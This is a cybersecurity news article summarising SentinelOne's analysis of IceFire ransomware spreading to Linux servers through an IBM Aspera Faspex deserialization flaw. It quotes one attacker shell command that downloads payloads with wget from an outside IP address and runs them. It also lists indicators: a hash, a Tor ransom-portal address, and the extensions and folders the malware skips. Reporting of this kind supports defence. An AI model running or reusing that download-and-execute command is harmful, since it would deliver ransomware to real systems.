Friday, May 2, 2025
HomeCyber Security NewsIceFire Ransomware Attacks Both Windows and Linux Enterprise Networks

IceFire Ransomware Attacks Both Windows and Linux Enterprise Networks

Published on

SIEM as a Service

Follow Us on Google News

Recently, security analysts at SentinelOne got to know about an infamous IceFire ransomware that has been found attacking both Windows and Linux enterprise networks.

An IceFire ransomware attack encrypts the files of the victim and demands payment in exchange for the key to decrypt them. This malware has been responsible for a great deal of damage, both to the personal computers of individuals and the computers of large organizations, since it was first discovered in 2020. 

In recent weeks, hackers have been deploying the “IceFire” ransomware against Linux enterprise networks, a large shift from its previous usage against Windows-based networks. It is mainly launching these attacks against Linux networks connected to the Internet.

- Advertisement - Google News

IceFire Ransomware Linux & Windows

According to the analysis, a 2.18 MB binary was compiled with gcc for AMD64 architecture, which is the IceFire Linux version:-

  • SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973

A sample of IceFire was tested on Ubuntu and Debian, two Intel-based distributions; both test systems successfully ran IceFire. A download of two payloads was performed using wget by the system, and they were saved to the:- 

/opt/aspera/faspex:

sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo

Exploiting the Flaw in IBM Aspera Faspex

Aspera Faspex file-sharing software contains a deserialization vulnerability tracked as CVE-2022-47986 that IceFire operators exploit to gain access to targets’ vulnerable systems and install ransomware payloads on them.

Around 150 Aspera Faspex servers are currently online, according to the Shodan database, most of which are located in the United States and China.

Linux has been found to be more challenging to deploy ransomware against than Windows, especially when it comes to large-scale deployments. 

As a solution to this problem, actors tend to exploit application vulnerabilities, as demonstrated by the IceFire operator, who deployed payloads by exploiting a vulnerability in the IBM Aspera system.”

Hackers Are Targeting Linux

It is common practice to use systems that are based on Linux in enterprise settings in order to perform crucial tasks such as hosting databases, Web servers, and other applications that are mission-critical for the enterprise.

Therefore, these systems are often seen as more valuable targets by ransomware actors than Windows-based computers, due to the likelihood of a higher payout from a successful attack, in comparison to a typical Windows user.

Files and folders Excluded

As part of the sample, there is a list of file extensions referenced by data segments. Due to the fact that they refer to executables, applications, or system functionality, these extensions are excluded from encryption.

Excluded Files:

.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx

Folders That are Being Excluded:

  • /boot: Data used at startup
  • /dev: Device files, drivers
  • /etc: System configuration files
  • /lib: An application or system uses a shared library for dynamically linking functionality
  • /proc: Linux offers a virtual filesystem for storing runtime information about the system, such as PIDs, mounted drives, system configurations, etc.
  • /srv: Web server directories
  • /sys: Interface to the kernel; similar to /proc
  • /usr: User-level binaries and static data
  • /var: Dynamic data, e.g. caches, databases
  • /run: System information, including PID files; cleared on each reboot

Ransom Notes

IceFire embeds the ransom note into a binary resource that is dropped and written to each directory targeted for file encryption.

A hardcoded username and password are included in the ransom note so you can log into the ransom payment portal hosted on a Tor-hidden service at:-

  • 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion

It is evident from this evolution for IceFire that ransomware targeting Linux will continue to grow in popularity through the year 2023, no matter how long it lasts.

The deployment of ransomware against Linux is much more difficult than Windows, especially if you want to do it on a large scale.

The cybersecurity team at SentinelOne has done its best to provide all the essential details of the ransomware attack.

Network Security Checklist – Download Free E-Book

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

NVIDIA Riva AI Speech Flaw Let Hackers Gain Unauthorized Access to Abuse GPU Resources & API keys

Researchers have uncovered significant security vulnerabilities in NVIDIA Riva, a breakthrough AI speech technology...

Tsunami Malware Surge: Blending Miners and Credential Stealers in Active Attacks

Security researchers have recently discovered a sophisticated malware operation called the "Tsunami-Framework" that combines...

The Double-Edged Sword of AI in Cybersecurity: Threats, Defenses & the Dark Web Insights Report 2025

Check Point Research's latest AI Security Report 2025 reveals a rapidly evolving cybersecurity landscape...

Hackers Exploit New Eye Pyramid Offensive Tool With Python to Launch Cyber Attacks

Security researchers from Intrinsec have published a comprehensive analysis revealing significant overlaps in...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

NVIDIA Riva AI Speech Flaw Let Hackers Gain Unauthorized Access to Abuse GPU Resources & API keys

Researchers have uncovered significant security vulnerabilities in NVIDIA Riva, a breakthrough AI speech technology...

Tsunami Malware Surge: Blending Miners and Credential Stealers in Active Attacks

Security researchers have recently discovered a sophisticated malware operation called the "Tsunami-Framework" that combines...

The Double-Edged Sword of AI in Cybersecurity: Threats, Defenses & the Dark Web Insights Report 2025

Check Point Research's latest AI Security Report 2025 reveals a rapidly evolving cybersecurity landscape...